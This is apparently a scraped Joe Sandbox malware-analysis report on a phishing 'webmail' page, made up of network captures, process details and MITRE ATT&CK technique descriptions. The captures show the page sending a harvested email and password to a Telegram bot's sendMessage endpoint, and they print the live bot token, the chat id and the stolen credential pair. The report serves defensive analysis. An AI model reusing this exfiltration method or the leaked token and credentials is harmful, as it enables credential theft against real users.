2025-01-09 18:29:42 UTC	400	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 35 31 30 34 33 35 31 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 55 6c 74 72 61 5f 6e 65 77 62 6f 74 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 55 6c 74 61 5f 6e 65 33 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 36 38 33 30 37 37 33 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 6f 6f 64 6c 69 66 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 34 34 37 33 38 32 2c 22 74 65 78 74 22 3a 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 57 45 53 54 45 52 4e 2d 50 52 4f 50 41 52 47 41 4e 44 41 3d 3d 3d 3d Data Ascii: {"ok":true,"result":{"message_id":436,"from":{"id":6510435122,"is_bot":true,"first_name":"Ultra_newbot3","username":"Ulta_ne3bot"},"chat":{"id":7468307739,"first_name":"Goodlife","type":"private"},"date":1736447382,"text":"=========WESTERN-PROPARGANDA====

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49898	149.154.167.220	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:29:43 UTC	401	OUT	GET /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:29:43 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:29:43 GMT Content-Type: application/json Content-Length: 80 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 18:29:43 UTC	80	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	50000	149.154.167.220	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:30:05 UTC	742	OUT	POST /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive Content-Length: 161 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-type: application/json; charset=UTF-8 Accept: / Origin: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:30:05 UTC	161	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 37 34 36 38 33 30 37 37 33 39 22 2c 22 74 65 78 74 22 3a 22 5c 6e 3d 3d 3d 3d 3d 3d 3d 3d 3d 57 45 53 54 45 52 4e 2d 50 52 4f 50 41 52 47 41 4e 44 41 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 75 73 65 72 3a 5c 74 6d 64 35 78 39 78 40 61 69 6b 7a 6d 79 2e 6e 65 74 5c 6e 70 61 73 73 3a 5c 74 3f 4d 73 76 65 77 59 3a 5b 46 70 5f 5a 5c 6e 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 22 7d Data Ascii: {"chat_id":"7468307739","text":"\n=========WESTERN-PROPARGANDA==========\nuser:\tmd5x9x@aikzmy.net\npass:\t?MsvewY:[Fp_Z\n===================================\n"}
2025-01-09 18:30:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:30:05 GMT Content-Type: application/json Content-Length: 401 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 18:30:05 UTC	401	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 35 31 30 34 33 35 31 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 55 6c 74 72 61 5f 6e 65 77 62 6f 74 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 55 6c 74 61 5f 6e 65 33 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 36 38 33 30 37 37 33 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 6f 6f 64 6c 69 66 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 34 34 37 34 30 35 2c 22 74 65 78 74 22 3a 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 57 45 53 54 45 52 4e 2d 50 52 4f 50 41 52 47 41 4e 44 41 3d 3d 3d 3d Data Ascii: {"ok":true,"result":{"message_id":437,"from":{"id":6510435122,"is_bot":true,"first_name":"Ultra_newbot3","username":"Ulta_ne3bot"},"chat":{"id":7468307739,"first_name":"Goodlife","type":"private"},"date":1736447405,"text":"=========WESTERN-PROPARGANDA====

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	50001	149.154.167.220	443	3664	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 18:30:06 UTC	401	OUT	GET /bot6510435122:AAGGrUI8KNiRsZwXvCj87UhSKIiQFusr7BY/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-09 18:30:06 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 18:30:06 GMT Content-Type: application/json Content-Length: 80 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-09 18:30:06 UTC	80	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 65 73 73 61 67 65 20 74 65 78 74 20 69 73 20 65 6d 70 74 79 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}

Target ID:	0
Start time:	13:28:56
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	13:28:59
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2008,i,14160700522982545157,12420359413549294288,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	13:29:05
Start date:	09/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Static File Info

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Windows Analysis Report
https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html